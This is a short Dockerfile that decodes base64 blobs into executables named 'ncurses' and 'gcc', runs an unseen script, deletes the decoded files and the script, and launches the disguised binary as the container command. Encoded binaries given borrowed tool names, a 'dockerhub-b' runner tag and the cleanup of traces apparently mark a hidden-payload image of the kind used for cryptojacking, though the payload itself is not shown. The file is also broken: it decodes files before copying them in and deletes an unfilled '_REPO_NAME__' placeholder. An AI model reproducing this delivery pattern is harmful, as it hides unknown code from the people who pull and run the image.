FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > ncurses.log'

RUN base64 --decode ncurses.64 > ncurses
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY ncurses .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' ncurses
RUN bash ./docker.sh

RUN rm --force --recursive ncurses _REPO_NAME__.64 docker.sh gcc gcc.64

CMD ncurses
